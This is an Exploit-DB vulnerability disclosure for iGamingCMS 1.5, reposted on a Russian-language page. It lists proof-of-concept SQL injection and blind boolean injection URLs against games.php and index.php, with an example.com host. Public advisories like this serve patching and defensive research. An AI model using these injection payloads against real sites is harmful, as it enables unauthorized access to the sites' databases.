- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14820
- Проверка EDB
-
- Пройдено
- Автор
- SWEET
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5841
- Дата публикации
- 2010-08-27
Код:
############################################################################
# #
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities #
# #
# Date: 27/08/2010 #
# #
# Author: Sweet #
# #
# Contact : [email protected] #
# #
# Software Link: http://www.igamingcms.com/ #
# #
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5 #
# #
# Version:1.5 #
# #
# Tested on: WinXp sp3 #
# #
# Risk : hight #
# #
# #
# Description : iGaming CMS is a content management #
# system designed for gaming websites. #
# #
# #
# #
############################################################################
1-SQL injection:
http://www.example.com/igamingpath/games.php?order=1[SQLi]&[email protected]&sort=desc
2-Blind injection:
http://www.example.com/igamingpath/games.php?order=title&[email protected]'+and+31337-31337='0&sort=desc
http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0
thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com
Saha Ftourkoum et 1,2,3 viva L'Algerie :))- Источник
- www.exploit-db.com
